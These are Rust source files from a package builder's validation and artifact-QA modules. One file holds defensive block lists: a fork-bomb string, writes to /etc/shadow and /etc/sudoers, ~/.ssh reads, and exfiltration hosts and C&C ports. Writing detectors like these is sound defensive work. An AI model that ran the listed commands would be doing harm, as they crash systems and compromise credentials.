pub(crate) fn validate_path(path: &str) -> Result<(), Error> {
// Check if path is within allowed build environment
if !rules::is_within_build_env(path) {
return Err(BuildError::InvalidPath {
path: path.to_string(),
reason: "Path is outside the allowed build environment".to_string(),
}
.into());
}
// Additional check for path traversal attempts beyond what is_within_build_env allows
if path.contains("../../..") {
return Err(BuildError::InvalidPath {
path: path.to_string(),
reason: "Too many levels of path traversal".to_string(),
}
.into());
}
Ok(())
}
/// Validate command arguments
fn validate_arguments(args: &[String]) -> Result<(), Error> {
for arg in args {
// Check for dangerous patterns in arguments
if arg.contains("sudo") || arg.contains("doas") {
return Err(BuildError::DangerousCommand {
command: arg.clone(),
reason: "Privilege escalation commands are not allowed".to_string(),
}
.into());
}
// Check for command substitution attempts
if arg.contains("$(") || arg.contains('`') {
return Err(BuildError::CommandParseError {
command: arg.clone(),
reason: "Command substitution in arguments is not allowed".to_string(),
}
.into());
}
}
Ok(())
}
// Note: SecurityContext is used during execution for stateful validation.
// This module handles recipe-time validation using config.toml allowed commands.
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/validation/rules.rs | crates/builder/src/validation/rules.rs | //! Security rules and patterns for command validation
// Note: Command validation is now done via config.toml allowlist.
// Only commands explicitly listed in ~/.config/sps2/config.toml are allowed.
/// Build-time variables that are safe to use in paths
pub const BUILD_VARIABLES: &[&str] = &[
"${DESTDIR}",
"${PREFIX}",
"${BUILD_DIR}",
"${SOURCE_DIR}",
"${srcdir}",
"${builddir}",
"${pkgdir}",
"${PWD}",
"${OLDPWD}",
];
/// Dangerous patterns to check for in shell commands
pub const DANGEROUS_PATTERNS: &[&str] = &[
// Attempts to modify shell profile
"~/.bashrc",
"~/.profile",
"~/.zshrc",
"/etc/profile",
// Attempts to modify system configs
"/etc/passwd",
"/etc/shadow",
"/etc/sudoers",
"/etc/hosts",
// Fork bombs
":(){ :|:& };:",
// Attempts to redirect to system files
"> /etc/",
">> /etc/",
"> /sys/",
">> /sys/",
"> /dev/",
">> /dev/",
// Attempts to read sensitive files
"/etc/shadow",
"/private/etc/", // macOS system files
"~/.ssh/",
// Background process attempts
"nohup",
"disown",
"&>/dev/null &", // Running in background
// Dangerous environment modifications
"export PATH=",
"export LD_LIBRARY_PATH=",
"export DYLD_", // macOS dynamic linker
];
/// System paths that should not be modified
pub const SYSTEM_PATHS: &[&str] = &[
"/",
"/bin",
"/sbin",
"/etc",
"/sys",
"/proc",
"/dev",
"/boot",
"/lib",
"/lib64",
"/usr/bin",
"/usr/sbin",
"/usr/lib",
"/usr/include", // Ok to read, not to write
"/usr/local", // Ok to read, careful with writes
"/var",
"/tmp", // Be careful - some ops might be ok
"/root",
"/home", // User homes should not be touched
// macOS specific
"/System",
"/Library",
"/Applications",
"/Users",
"/private",
"/cores",
"/Network",
"/Volumes",
// Our own paths that should not be modified directly
"/opt/pm/state", // State database
"/opt/pm/index", // Package index
"/opt/pm/live", // Live packages - only through proper APIs
];
/// Check if a command is trying to use rsync remotely
pub fn is_remote_rsync(args: &[String]) -> bool {
// Look for remote rsync patterns like user@host: or host:
args.iter().any(|arg| {
arg.contains('@') && arg.contains(':') || // user@host:path
arg.matches(':').count() == 1 && !arg.starts_with('/') // host:path
})
}
/// Check if a path is within the build environment
pub fn is_within_build_env(path: &str) -> bool {
// Allowed paths during build
path.starts_with("/opt/pm/build/") ||
path.starts_with("./") ||
path.starts_with("../") && !path.contains("../../..") || // Max 2 levels up
!path.starts_with('/') // Relative paths are ok
}
/// Check if a URL is suspicious
pub fn is_suspicious_url(url: &str) -> bool {
// Check for data exfiltration attempts
url.contains("webhook") ||
url.contains("requestbin") ||
url.contains("ngrok.io") ||
url.contains("localhost") ||
url.contains("127.0.0.1") ||
url.contains("0.0.0.0") ||
// Check for non-standard ports that might indicate C&C
url.contains(":1337") ||
url.contains(":31337") ||
url.contains(":4444") ||
url.contains(":8888")
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/artifact_qa/diagnostics.rs | crates/builder/src/artifact_qa/diagnostics.rs | //! Diagnostic reporting for post-validation issues
use std::collections::HashMap;
use std::fmt::Write;
use std::path::{Path, PathBuf};
/// A detailed diagnostic finding from validation
#[derive(Debug, Clone)]
pub struct ValidationFinding {
/// The file where the issue was found
pub file_path: PathBuf,
/// The type of issue found
pub issue_type: IssueType,
/// Additional context about the finding
pub context: HashMap<String, String>,
}
/// Types of validation issues
#[derive(Debug, Clone)]
pub enum IssueType {
/// Hardcoded build path found
HardcodedBuildPath { path: String, offset: Option<usize> },
/// Hardcoded placeholder path found
HardcodedPlaceholder { path: String, offset: Option<usize> },
/// Bad RPATH in Mach-O binary
BadRPath { rpath: String },
/// Bad install name in Mach-O binary
BadInstallName { install_name: String },
/// Self-referencing install name in Mach-O binary
SelfReferencingInstallName { install_name: String },
/// Build path in static archive
BuildPathInArchive {
path: String,
member: Option<String>,
},
/// Generic issue with custom message
Custom { message: String },
}
impl IssueType {
/// Get a human-readable description of the issue
///
/// The returned description should be used for displaying to users or logging.
#[must_use]
pub fn description(&self) -> String {
match self {
Self::HardcodedBuildPath { path, .. } => {
format!("Contains hardcoded build path: {path}")
}
Self::HardcodedPlaceholder { path, .. } => {
format!("Contains placeholder path: {path}")
}
Self::BadRPath { rpath } => {
format!("Contains bad RPATH: {rpath}")
}
Self::BadInstallName { install_name } => {
format!("Contains bad install name: {install_name}")
}
Self::SelfReferencingInstallName { install_name } => {
format!("Contains self-referencing install name: {install_name}")
}
Self::BuildPathInArchive { path, member } => {
if let Some(member) = member {
format!("Archive member '{member}' contains build path: {path}")
} else {
format!("Archive contains build path: {path}")
}
}
Self::Custom { message } => message.clone(),
}
}
}
/// Collector for validation findings
#[derive(Debug, Default)]
pub struct DiagnosticCollector {
findings: Vec<ValidationFinding>,
}
impl DiagnosticCollector {
/// Create a new diagnostic collector
///
/// The collector must be used to accumulate validation findings during validation passes.
#[must_use]
pub fn new() -> Self {
Self::default()
}
/// Add a finding to the collector
pub fn add_finding(&mut self, finding: ValidationFinding) {
self.findings.push(finding);
}
/// Add a hardcoded path finding
pub fn add_hardcoded_path(
&mut self,
file_path: impl Into<PathBuf>,
path: impl Into<String>,
is_placeholder: bool,
) {
let issue_type = if is_placeholder {
IssueType::HardcodedPlaceholder {
path: path.into(),
offset: None,
}
} else {
IssueType::HardcodedBuildPath {
path: path.into(),
offset: None,
}
};
self.add_finding(ValidationFinding {
file_path: file_path.into(),
issue_type,
context: HashMap::new(),
});
}
/// Add a Mach-O issue
pub fn add_macho_issue(&mut self, file_path: impl Into<PathBuf>, issue_type: IssueType) {
self.add_finding(ValidationFinding {
file_path: file_path.into(),
issue_type,
context: HashMap::new(),
});
}
/// Check if there are any findings
///
/// Returns true if any validation issues were found. This should be used to determine
/// if further action (patching or reporting) is needed.
#[must_use]
pub fn has_findings(&self) -> bool {
!self.findings.is_empty()
}
/// Get the number of findings
///
/// Returns the total count of validation issues found.
#[must_use]
pub fn count(&self) -> usize {
self.findings.len()
}
/// Get all findings
///
/// Returns a slice of all validation findings collected. Use this to iterate over
/// findings for reporting or processing.
#[must_use]
pub fn findings(&self) -> &[ValidationFinding] {
&self.findings
}
/// Take all findings, consuming the collector
///
/// Consumes the collector and returns the owned vector of findings. Use this when
/// you need to pass findings to another component.
#[must_use]
pub fn into_findings(self) -> Vec<ValidationFinding> {
self.findings
}
/// Generate a summary by file
///
/// Groups findings by the file they were found in. Use this to generate per-file reports.
#[must_use]
pub fn summarize_by_file(&self) -> HashMap<&Path, Vec<&ValidationFinding>> {
let mut summary: HashMap<&Path, Vec<&ValidationFinding>> = HashMap::new();
for finding in &self.findings {
summary
.entry(finding.file_path.as_path())
.or_default()
.push(finding);
}
summary
}
/// Generate detailed diagnostic messages suitable for event emission
///
/// Returns formatted messages grouped by file. These messages should be used for
/// user-facing output through the event system.
#[must_use]
pub fn generate_diagnostic_messages(&self) -> Vec<String> {
let mut messages = Vec::new();
// Group by file for better readability
let by_file = self.summarize_by_file();
for (file_path, findings) in by_file {
let mut file_msg = format!("File: {}", file_path.display());
for finding in findings {
write!(file_msg, "\n - {}", finding.issue_type.description()).unwrap();
}
messages.push(file_msg);
}
messages
}
/// Get all files that have hardcoded build paths or placeholders
///
/// Returns files containing hardcoded paths grouped with their findings. Use this to
/// identify files that need path patching.
#[must_use]
pub fn get_files_with_hardcoded_paths(&self) -> HashMap<&Path, Vec<&ValidationFinding>> {
let mut result: HashMap<&Path, Vec<&ValidationFinding>> = HashMap::new();
for finding in &self.findings {
match &finding.issue_type {
IssueType::HardcodedBuildPath { .. } | IssueType::HardcodedPlaceholder { .. } => {
result
.entry(finding.file_path.as_path())
.or_default()
.push(finding);
}
_ => {}
}
}
result
}
/// Get all files that have Mach-O issues (bad RPATHs, install names, etc.)
///
/// Returns Mach-O binaries with issues grouped with their findings. Use this to
/// identify binaries that need RPATH or install name patching.
#[must_use]
pub fn get_files_with_macho_issues(&self) -> HashMap<&Path, Vec<&ValidationFinding>> {
let mut result: HashMap<&Path, Vec<&ValidationFinding>> = HashMap::new();
for finding in &self.findings {
match &finding.issue_type {
IssueType::BadRPath { .. }
| IssueType::BadInstallName { .. }
| IssueType::SelfReferencingInstallName { .. } => {
result
.entry(finding.file_path.as_path())
.or_default()
.push(finding);
}
_ => {}
}
}
result
}
/// Get all findings for a specific file
///
/// Returns all validation findings for the specified file path.
#[must_use]
pub fn get_findings_for_file(&self, path: &Path) -> Vec<&ValidationFinding> {
self.findings
.iter()
.filter(|f| f.file_path == path)
.collect()
}
/// Filter findings by issue type
pub fn filter_by_issue_type<F>(&self, predicate: F) -> Vec<&ValidationFinding>
where
F: Fn(&IssueType) -> bool,
{
self.findings
.iter()
.filter(|f| predicate(&f.issue_type))
.collect()
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/artifact_qa/router.rs | crates/builder/src/artifact_qa/router.rs | //! Build system-specific post-validation pipeline routing
//!
//! This module determines which validation pipeline to use based on the
//! build systems detected during the build process. Different build systems
//! have different requirements for post-validation to avoid breaking binaries.
use super::{PatcherAction, ValidatorAction};
use crate::artifact_qa::patchers::{
binary_string::BinaryStringPatcher, codesigner::CodeSigner, headers::HeaderPatcher,
la_cleaner::LaFileCleaner, object_cleaner::ObjectFileCleaner, pkgconfig::PkgConfigPatcher,
placeholder::PlaceholderPatcher, python_bytecode_cleanup::PythonBytecodeCleanupPatcher,
python_isolation::PythonIsolationPatcher, rpath::RPathPatcher,
};
use crate::artifact_qa::scanners::{
archive::ArchiveScanner, hardcoded::HardcodedScanner, macho::MachOScanner,
staging::StagingScanner,
};
use sps2_types::{BuildSystemProfile, RpathStyle};
use std::collections::HashSet;
use std::hash::BuildHasher;
/// Determine the build system profile with optional manual override
pub fn determine_profile_with_override<S: BuildHasher>(
used_build_systems: &HashSet<String, S>,
qa_override: Option<sps2_types::QaPipelineOverride>,
) -> Option<BuildSystemProfile> {
// Check for manual override first
if let Some(override_val) = qa_override {
if override_val.skips_qa() {
return None; // Skip QA entirely
}
if let Some(profile) = override_val.to_profile() {
return Some(profile); // Use manual override
}
}
// Fall back to automatic detection
Some(determine_profile(used_build_systems))
}
/// Determine the build system profile based on used build systems
pub fn determine_profile<S: BuildHasher>(
used_build_systems: &HashSet<String, S>,
) -> BuildSystemProfile {
// If empty, default to full validation
if used_build_systems.is_empty() {
return BuildSystemProfile::NativeFull;
}
// Check for specific build systems in priority order
// Rust takes precedence - if Rust is used, we must use minimal validation
if used_build_systems.contains("cargo") {
return BuildSystemProfile::RustMinimal;
}
// Go is next priority
if used_build_systems.contains("go") {
return BuildSystemProfile::GoMedium;
}
// Script languages
if used_build_systems.contains("python") || used_build_systems.contains("nodejs") {
return BuildSystemProfile::ScriptLight;
}
// C/C++ build systems default to full validation
BuildSystemProfile::NativeFull
}
/// Get validators for a specific build system profile
///
/// Returns the appropriate set of validators based on the build system profile.
/// Different profiles have different validation requirements.
#[must_use]
pub fn get_validators_for_profile(profile: BuildSystemProfile) -> Vec<ValidatorAction> {
match profile {
BuildSystemProfile::NativeFull => {
// Full validation for C/C++ projects
vec![
ValidatorAction::StagingScanner(StagingScanner),
ValidatorAction::HardcodedScanner(HardcodedScanner),
ValidatorAction::MachOScanner(MachOScanner),
ValidatorAction::ArchiveScanner(ArchiveScanner),
]
}
BuildSystemProfile::RustMinimal => {
// Minimal validation for Rust to avoid breaking panic unwinding
vec![
ValidatorAction::StagingScanner(StagingScanner),
// Skip HardcodedScanner - Rust binaries often have debug paths
// Skip MachOScanner - Rust manages its own dylib paths
// Skip ArchiveScanner for Rust
]
}
BuildSystemProfile::GoMedium => {
// Medium validation for Go
vec![
ValidatorAction::StagingScanner(StagingScanner),
ValidatorAction::HardcodedScanner(HardcodedScanner),
ValidatorAction::MachOScanner(MachOScanner),
// Skip ArchiveScanner for Go
]
}
BuildSystemProfile::ScriptLight => {
// Light validation for scripting languages
vec![
ValidatorAction::StagingScanner(StagingScanner),
ValidatorAction::HardcodedScanner(HardcodedScanner),
// Skip binary scanners for script-based packages
]
}
}
}
/// Get patchers for a specific build system profile
///
/// Returns the appropriate set of patchers based on the build system profile.
/// The order of patchers is important - `CodeSigner` must always run last.
#[must_use]
pub fn get_patchers_for_profile(profile: BuildSystemProfile) -> Vec<PatcherAction> {
match profile {
BuildSystemProfile::NativeFull => {
// Full patching pipeline for C/C++
vec![
// PermissionsFixer removed - only runs when explicitly called via fix_permissions()
PatcherAction::PlaceholderPatcher(PlaceholderPatcher),
PatcherAction::BinaryStringPatcher(BinaryStringPatcher),
PatcherAction::RPathPatcher(RPathPatcher::new(RpathStyle::Modern)),
PatcherAction::HeaderPatcher(HeaderPatcher),
PatcherAction::PkgConfigPatcher(PkgConfigPatcher),
PatcherAction::LaFileCleaner(LaFileCleaner),
PatcherAction::ObjectFileCleaner(ObjectFileCleaner),
// CodeSigner MUST run last
PatcherAction::CodeSigner(CodeSigner::new()),
]
}
BuildSystemProfile::RustMinimal => {
// Minimal patching for Rust - avoid binary patching and re-signing
vec![
// Skip everything - Rust sets permissions correctly
// No permission fixing, no binary modifications, no code signing
]
}
BuildSystemProfile::GoMedium => {
// Medium patching for Go
vec![
// PermissionsFixer removed - only runs when explicitly called
PatcherAction::PlaceholderPatcher(PlaceholderPatcher),
// Skip rpath patching (Go uses static linking mostly)
// Minimal code signing if needed
PatcherAction::CodeSigner(CodeSigner::new()),
]
}
BuildSystemProfile::ScriptLight => {
// Light patching for scripts
vec![
// PermissionsFixer removed - only runs when explicitly called
PatcherAction::HeaderPatcher(HeaderPatcher),
PatcherAction::PkgConfigPatcher(PkgConfigPatcher),
// Clean up Python bytecode before creating wrapper scripts
PatcherAction::PythonBytecodeCleanupPatcher(PythonBytecodeCleanupPatcher),
PatcherAction::PythonIsolationPatcher(PythonIsolationPatcher),
// Skip binary patchers for script packages
]
}
}
}
/// Get a descriptive name for the pipeline
///
/// Returns a human-readable name for the validation pipeline.
#[must_use]
pub fn get_pipeline_name(profile: BuildSystemProfile) -> &'static str {
match profile {
BuildSystemProfile::NativeFull => "Full C/C++ validation pipeline",
BuildSystemProfile::RustMinimal => "Minimal Rust validation pipeline",
BuildSystemProfile::GoMedium => "Medium Go validation pipeline",
BuildSystemProfile::ScriptLight => "Light script validation pipeline",
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/artifact_qa/reports.rs | crates/builder/src/artifact_qa/reports.rs | //! Small helpers for collecting diagnostics from validators / patchers.
use std::fmt::Write;
use crate::artifact_qa::diagnostics::DiagnosticCollector;
#[derive(Default, Debug)]
pub struct Report {
pub changed_files: Vec<std::path::PathBuf>,
pub warnings: Vec<String>,
pub errors: Vec<String>,
/// Findings from validators that can be passed to patchers
pub findings: Option<DiagnosticCollector>,
}
impl Report {
/// Create an empty report indicating success
///
/// Use this when a validation or patching operation completes without issues.
#[must_use]
pub fn ok() -> Self {
Self::default()
}
/// Check if the report contains fatal errors
///
/// Returns true if there are any errors that should stop the build process.
#[must_use]
pub fn is_fatal(&self) -> bool {
!self.errors.is_empty()
}
/// Add another report’s data into `self`.
pub fn absorb(&mut self, other: Report) {
self.changed_files.extend(other.changed_files);
self.warnings.extend(other.warnings);
self.errors.extend(other.errors);
// Merge findings
if let Some(other_findings) = other.findings {
if let Some(ref mut our_findings) = self.findings {
// Merge other findings into ours
for finding in other_findings.into_findings() {
our_findings.add_finding(finding);
}
} else {
// We don't have findings yet, take theirs
self.findings = Some(other_findings);
}
}
}
/// Render the report as a formatted string
///
/// Returns a human-readable summary with the given title. Use this for event emission.
#[must_use]
pub fn render(&self, title: &str) -> String {
let mut s = String::new();
let _ = writeln!(s, "{title}:");
for e in &self.errors {
let _ = writeln!(s, " {e}");
}
for w in &self.warnings {
let _ = writeln!(s, " (warning) {w}");
}
s
}
}
/// Convenience wrap that merges many [`Report`]s.
#[derive(Default)]
pub struct MergedReport(Report);
impl MergedReport {
pub fn absorb(&mut self, r: Report) {
self.0.absorb(r);
}
/// Check if the merged report contains fatal errors
///
/// Returns true if any absorbed report contained errors.
#[must_use]
pub fn is_fatal(&self) -> bool {
self.0.is_fatal()
}
/// Render the merged report as a formatted string
///
/// Returns a human-readable summary of all absorbed reports.
#[must_use]
pub fn render(&self, title: &str) -> String {
self.0.render(title)
}
/// Get the collected findings
///
/// Returns the diagnostic collector if any findings were collected from absorbed reports.
#[must_use]
pub fn findings(&self) -> Option<&DiagnosticCollector> {
self.0.findings.as_ref()
}
/// Take the collected findings
pub fn take_findings(&mut self) -> Option<DiagnosticCollector> {
self.0.findings.take()
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/artifact_qa/mod.rs | crates/builder/src/artifact_qa/mod.rs | //! Public façade – `workflow.rs` calls only `run_quality_pipeline()`.
pub mod diagnostics;
pub mod macho_utils;
pub mod patchers;
pub mod reports;
pub mod router;
pub mod scanners;
pub mod traits;
use crate::{utils::events::send_event, BuildContext, BuildEnvironment};
use diagnostics::DiagnosticCollector;
use reports::{MergedReport, Report};
use sps2_errors::{BuildError, Error};
use sps2_events::{
events::{QaCheckStatus, QaCheckSummary, QaFinding, QaLevel, QaSeverity, QaTarget},
AppEvent, FailureContext, GeneralEvent, QaEvent,
};
use sps2_types::BuildSystemProfile;
use std::convert::TryFrom;
use std::time::{Duration, Instant};
use traits::Action;
/// Enum for all validators
pub enum ValidatorAction {
HardcodedScanner(scanners::hardcoded::HardcodedScanner),
MachOScanner(scanners::macho::MachOScanner),
ArchiveScanner(scanners::archive::ArchiveScanner),
StagingScanner(scanners::staging::StagingScanner),
}
/// Enum for all patchers
pub enum PatcherAction {
PermissionsFixer(patchers::permissions::PermissionsFixer),
PlaceholderPatcher(patchers::placeholder::PlaceholderPatcher),
RPathPatcher(patchers::rpath::RPathPatcher),
HeaderPatcher(patchers::headers::HeaderPatcher),
PkgConfigPatcher(patchers::pkgconfig::PkgConfigPatcher),
BinaryStringPatcher(patchers::binary_string::BinaryStringPatcher),
LaFileCleaner(patchers::la_cleaner::LaFileCleaner),
ObjectFileCleaner(patchers::object_cleaner::ObjectFileCleaner),
PythonBytecodeCleanupPatcher(patchers::python_bytecode_cleanup::PythonBytecodeCleanupPatcher),
PythonIsolationPatcher(patchers::python_isolation::PythonIsolationPatcher),
CodeSigner(patchers::codesigner::CodeSigner),
}
impl ValidatorAction {
fn name(&self) -> &'static str {
match self {
Self::HardcodedScanner(_) => scanners::hardcoded::HardcodedScanner::NAME,
Self::MachOScanner(_) => scanners::macho::MachOScanner::NAME,
Self::ArchiveScanner(_) => scanners::archive::ArchiveScanner::NAME,
Self::StagingScanner(_) => scanners::staging::StagingScanner::NAME,
}
}
async fn run(
&self,
ctx: &BuildContext,
env: &BuildEnvironment,
findings: Option<&DiagnosticCollector>,
) -> Result<Report, Error> {
match self {
Self::HardcodedScanner(_) => {
scanners::hardcoded::HardcodedScanner::run(ctx, env, findings).await
}
Self::MachOScanner(_) => scanners::macho::MachOScanner::run(ctx, env, findings).await,
Self::ArchiveScanner(_) => {
scanners::archive::ArchiveScanner::run(ctx, env, findings).await
}
Self::StagingScanner(_) => {
scanners::staging::StagingScanner::run(ctx, env, findings).await
}
}
}
}
impl PatcherAction {
fn name(&self) -> &'static str {
match self {
Self::PermissionsFixer(_) => patchers::permissions::PermissionsFixer::NAME,
Self::PlaceholderPatcher(_) => patchers::placeholder::PlaceholderPatcher::NAME,
Self::RPathPatcher(_) => patchers::rpath::RPathPatcher::NAME,
Self::HeaderPatcher(_) => patchers::headers::HeaderPatcher::NAME,
Self::PkgConfigPatcher(_) => patchers::pkgconfig::PkgConfigPatcher::NAME,
Self::BinaryStringPatcher(_) => patchers::binary_string::BinaryStringPatcher::NAME,
Self::LaFileCleaner(_) => patchers::la_cleaner::LaFileCleaner::NAME,
Self::ObjectFileCleaner(_) => patchers::object_cleaner::ObjectFileCleaner::NAME,
Self::PythonBytecodeCleanupPatcher(_) => {
patchers::python_bytecode_cleanup::PythonBytecodeCleanupPatcher::NAME
}
Self::PythonIsolationPatcher(_) => {
patchers::python_isolation::PythonIsolationPatcher::NAME
}
Self::CodeSigner(_) => patchers::codesigner::CodeSigner::NAME,
}
}
async fn run(
&self,
ctx: &BuildContext,
env: &BuildEnvironment,
findings: Option<&DiagnosticCollector>,
) -> Result<Report, Error> {
match self {
Self::PermissionsFixer(_) => {
patchers::permissions::PermissionsFixer::run(ctx, env, findings).await
}
Self::PlaceholderPatcher(_) => {
patchers::placeholder::PlaceholderPatcher::run(ctx, env, findings).await
}
Self::RPathPatcher(_) => patchers::rpath::RPathPatcher::run(ctx, env, findings).await,
Self::HeaderPatcher(_) => {
patchers::headers::HeaderPatcher::run(ctx, env, findings).await
}
Self::PkgConfigPatcher(_) => {
patchers::pkgconfig::PkgConfigPatcher::run(ctx, env, findings).await
}
Self::BinaryStringPatcher(_) => {
patchers::binary_string::BinaryStringPatcher::run(ctx, env, findings).await
}
Self::LaFileCleaner(_) => {
patchers::la_cleaner::LaFileCleaner::run(ctx, env, findings).await
}
Self::ObjectFileCleaner(_) => {
patchers::object_cleaner::ObjectFileCleaner::run(ctx, env, findings).await
}
Self::PythonBytecodeCleanupPatcher(_) => {
patchers::python_bytecode_cleanup::PythonBytecodeCleanupPatcher::run(
ctx, env, findings,
)
.await
}
Self::PythonIsolationPatcher(_) => {
patchers::python_isolation::PythonIsolationPatcher::run(ctx, env, findings).await
}
Self::CodeSigner(_) => patchers::codesigner::CodeSigner::run(ctx, env, findings).await,
}
}
}
/// Replace the former `run_quality_checks()`
///
/// * V1 – pre‑validation
/// * P – patch tree in‑place
/// * V2 – must be clean, else the build fails
///
/// # Errors
///
/// Returns an error if:
/// - Any scanner detects critical issues
/// - Failed to apply patches during the patching phase
/// - I/O errors occur during file analysis
/// - The final validation phase fails (V2 phase)
///
/// # Panics
///
/// This function will panic if `qa_override` results in a profile selection that returns `None`
/// from `determine_profile_with_override` but is not the `Skip` variant (this should not happen
/// in normal operation).
pub async fn run_quality_pipeline(
ctx: &BuildContext,
env: &BuildEnvironment,
qa_override: Option<sps2_types::QaPipelineOverride>,
) -> Result<(), Error> {
let pipeline_start = Instant::now();
let mut stats = QaStats::default();
let target = qa_target(ctx);
// Determine which pipeline to use based on build systems and override
let used_build_systems = env.used_build_systems();
let profile_opt = router::determine_profile_with_override(used_build_systems, qa_override);
// Check if QA is skipped entirely
if profile_opt.is_none() {
send_event(
ctx,
AppEvent::General(GeneralEvent::debug("Artifact QA pipeline completed")),
);
return Ok(());
}
let profile = profile_opt.unwrap();
let qa_level = qa_level_for_profile(profile);
send_event(
ctx,
AppEvent::Qa(QaEvent::PipelineStarted {
target: target.clone(),
level: qa_level,
}),
);
// ---------------- PHASE 1 -----------------
let mut pre = match run_validators(
ctx,
env,
router::get_validators_for_profile(profile),
false, // Don't allow early break - run all validators
&target,
&mut stats,
)
.await
{
Ok(report) => report,
Err(err) => {
emit_pipeline_failed(ctx, &target, &err);
return Err(err);
}
};
// Extract findings from Phase 1 validators to pass to patchers
let validator_findings = pre.take_findings();
// ---------------- PHASE 2 -----------------
if let Err(err) = run_patchers(
ctx,
env,
validator_findings,
router::get_patchers_for_profile(profile),
&target,
&mut stats,
)
.await
{
emit_pipeline_failed(ctx, &target, &err);
return Err(err);
}
// ---------------- PHASE 3 -----------------
let post = match run_validators(
ctx,
env,
router::get_validators_for_profile(profile),
true, // Allow early break in final validation
&target,
&mut stats,
)
.await
{
Ok(report) => report,
Err(err) => {
emit_pipeline_failed(ctx, &target, &err);
return Err(err);
}
};
if post.is_fatal() {
let failure_error: Error = BuildError::Failed {
message: post.render("Relocatability check failed"),
}
.into();
emit_pipeline_failed(ctx, &target, &failure_error);
return Err(failure_error);
} else if !pre.is_fatal() && !post.is_fatal() {
send_event(
ctx,
AppEvent::General(GeneralEvent::OperationCompleted {
operation: "Post‑build validation".into(),
success: true,
}),
);
}
let duration_ms = u64::try_from(pipeline_start.elapsed().as_millis()).unwrap_or(u64::MAX);
let total_checks = stats.total;
let failed_checks = stats.failed;
let passed_checks = total_checks.saturating_sub(failed_checks);
send_event(
ctx,
AppEvent::Qa(QaEvent::PipelineCompleted {
target,
total_checks,
passed: passed_checks,
failed: failed_checks,
duration_ms,
}),
);
Ok(())
}
/// Utility that runs validators and merges their reports.
async fn run_validators(
ctx: &BuildContext,
env: &BuildEnvironment,
actions: Vec<ValidatorAction>,
allow_early_break: bool,
target: &QaTarget,
stats: &mut QaStats,
) -> Result<MergedReport, Error> {
let mut merged = MergedReport::default();
for action in &actions {
let action_name = action.name();
let check_start = Instant::now();
let rep = action.run(ctx, env, None).await?;
emit_qa_check(
ctx,
target,
"validator",
action_name,
&rep,
check_start.elapsed(),
stats,
);
merged.absorb(rep);
if allow_early_break && merged.is_fatal() {
break; // short‑circuit early (saves time)
}
}
Ok(merged)
}
/// Utility that runs patchers and merges their reports.
async fn run_patchers(
ctx: &BuildContext,
env: &BuildEnvironment,
validator_findings: Option<DiagnosticCollector>,
actions: Vec<PatcherAction>,
target: &QaTarget,
stats: &mut QaStats,
) -> Result<MergedReport, Error> {
let mut merged = MergedReport::default();
for action in &actions {
let action_name = action.name();
let check_start = Instant::now();
let rep = action.run(ctx, env, validator_findings.as_ref()).await?;
emit_qa_check(
ctx,
target,
"patcher",
action_name,
&rep,
check_start.elapsed(),
stats,
);
merged.absorb(rep);
if merged.is_fatal() {
break; // short‑circuit early (saves time)
}
}
Ok(merged)
}
#[derive(Default)]
struct QaStats {
total: usize,
failed: usize,
}
fn qa_target(ctx: &BuildContext) -> QaTarget {
QaTarget {
package: ctx.name.clone(),
version: ctx.version.clone(),
}
}
fn qa_level_for_profile(profile: BuildSystemProfile) -> QaLevel {
match profile {
BuildSystemProfile::NativeFull => QaLevel::Strict,
BuildSystemProfile::GoMedium => QaLevel::Standard,
BuildSystemProfile::ScriptLight | BuildSystemProfile::RustMinimal => QaLevel::Fast,
}
}
fn qa_findings_from_report(report: &Report) -> Vec<QaFinding> {
let mut findings = Vec::new();
for message in &report.errors {
findings.push(QaFinding {
severity: QaSeverity::Error,
message: message.clone(),
file: None,
line: None,
});
}
for message in &report.warnings {
findings.push(QaFinding {
severity: QaSeverity::Warning,
message: message.clone(),
file: None,
line: None,
});
}
if let Some(diags) = &report.findings {
for finding in diags.findings() {
findings.push(QaFinding {
severity: QaSeverity::Warning,
message: finding.issue_type.description(),
file: Some(finding.file_path.clone()),
line: None,
});
}
}
findings
}
fn build_check_summary(
category: &str,
name: &str,
report: &Report,
duration: Duration,
) -> QaCheckSummary {
QaCheckSummary {
name: name.to_string(),
category: category.to_string(),
status: if report.is_fatal() {
QaCheckStatus::Failed
} else {
QaCheckStatus::Passed
},
duration_ms: Some(u64::try_from(duration.as_millis()).unwrap_or(u64::MAX)),
findings: qa_findings_from_report(report),
}
}
fn emit_qa_check(
ctx: &BuildContext,
target: &QaTarget,
category: &str,
action_name: &str,
report: &Report,
duration: Duration,
stats: &mut QaStats,
) {
let summary = build_check_summary(category, action_name, report, duration);
stats.total += 1;
if matches!(summary.status, QaCheckStatus::Failed) {
stats.failed += 1;
}
send_event(
ctx,
AppEvent::Qa(QaEvent::CheckEvaluated {
target: target.clone(),
summary,
}),
);
}
fn emit_pipeline_failed(ctx: &BuildContext, target: &QaTarget, error: &Error) {
send_event(
ctx,
AppEvent::Qa(QaEvent::PipelineFailed {
target: target.clone(),
failure: FailureContext::from_error(error),
}),
);
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/artifact_qa/macho_utils.rs | crates/builder/src/artifact_qa/macho_utils.rs | //! Shared utilities for working with Mach-O files
